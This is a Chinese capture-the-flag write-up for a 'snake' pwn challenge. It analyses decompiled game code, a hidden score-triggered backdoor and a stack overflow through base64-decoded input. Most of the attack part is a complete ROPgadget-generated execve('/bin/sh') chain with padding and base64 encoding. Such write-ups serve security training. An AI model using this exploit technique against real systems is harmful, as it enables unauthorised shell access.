第八届工业信息安全技能大赛全国复赛snake_wp
pwn题 snake writeup
多少有点不自信,太久没做题,看到题都有点怕怕的
这个程序是一个贪食蛇游戏,主程序如下:
__int64 __fastcall main_4015A5(__int64 a1, __int64 a2)
{
int v2; // edx
int v3; // ecx
int v4; // er8
int v5; // er9
int v7; // [rsp+Ch] [rbp-4h]
sub_400B6D();
do
{
LABEL_2:
sub_40158D();
sub_400CA6();
print_score_400E09(a1, a2, v2, v3, v4, v5);
v7 = getchar();
}
while ( v7 == -1 );
switch ( v7 )
{
case 'A':
case 'a':
if ( dword_6BEE04 != 1 )
dword_6BEE04 = 3;
goto LABEL_16;
case 'D':
case 'd':
if ( dword_6BEE04 != 3 )
dword_6BEE04 = 1;
goto LABEL_16;
case 'S':
case 's':
if ( dword_6BEE04 )
dword_6BEE04 = 2;
goto LABEL_16;
case 'W':
case 'w':
if ( dword_6BEE04 != 2 )
dword_6BEE04 = 0;
goto LABEL_16;
case 'q':
if ( score_dword_6BD3F0 == 2 )
binsh_401427(); //后门
return 0LL;
default:
LABEL_16:
sub_400E29();
if ( !(unsigned int)sub_400EDF() )
{
if ( qword_6BE4A0[0] == qword_6BE480 )
{
++score_dword_6BD3F0;
++dword_6BEE00;
sub_4014A7();
}
a1 = 100000LL;
usleep(0x186A0u);
goto LABEL_2;
}
IO_puts("Game Over!");
return 0LL;
}
}
根据这段代码可以知道,当得分为2时,输入q退出就会进入后门。
后门程序如下:
__int64 binsh_401427()
{
int v1; // [rsp+Ch] [rbp-474h] BYREF
char buf[1024]; // [rsp+10h] [rbp-470h] BYREF
char v3[104]; // [rsp+410h] [rbp-70h] BYREF
__int64 v4; // [rsp+478h] [rbp-8h]
IO_puts("?www!dev#etc$/bin/sh");
IO_fflush(off_6BB868);
getchar();
_libc_read(0, buf, 0x400uLL);
v4 = b64decode_40117D((__int64)buf, &v1);
return j___libc_memmove_ifunc_0((__int64)v3, v4, v1);// v4拷贝v1个字符到v3
}
这里先打印"?www!dev#etc$/bin/sh",然后读取最多400个字符到buf,然后经过base64解码(这里可以通过输入一些base64字符串可以看出),然后拷贝到v3,这里是存在栈溢出的。
然后ROPgadget一把梭
ROPgadget --binary pwn --ropchain
选取payload
#!/usr/bin/env python3
# execve generated by ROPgadget
from struct import pack
# Padding goes here
p = b''
p += pack('<Q', 0x00000000004113f3) # pop rsi ; ret
p += pack('<Q', 0x00000000006bb0e0) # @ .data
p += pack('<Q', 0x00000000004005af) # pop rax ; ret
p += b'/bin//sh'
p += pack('<Q', 0x0000000000480bb1) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x00000000004113f3) # pop rsi ; ret
p += pack('<Q', 0x00000000006bb0e8) # @ .data + 8
p += pack('<Q', 0x00000000004458a0) # xor rax, rax ; ret
p += pack('<Q', 0x0000000000480bb1) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x00000000004006a6) # pop rdi ; ret
p += pack('<Q', 0x00000000006bb0e0) # @ .data
p += pack('<Q', 0x00000000004113f3) # pop rsi ; ret
p += pack('<Q', 0x00000000006bb0e8) # @ .data + 8
p += pack('<Q', 0x000000000044cb86) # pop rdx ; ret
p += pack('<Q', 0x00000000006bb0e8) # @ .data + 8
p += pack('<Q', 0x00000000004458a0) # xor rax, rax ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000401dac) # syscall
from base64 import b64encode
payload = b'a'*120 + p
print(b64encode(payload))
浙公网安备 33010602011771号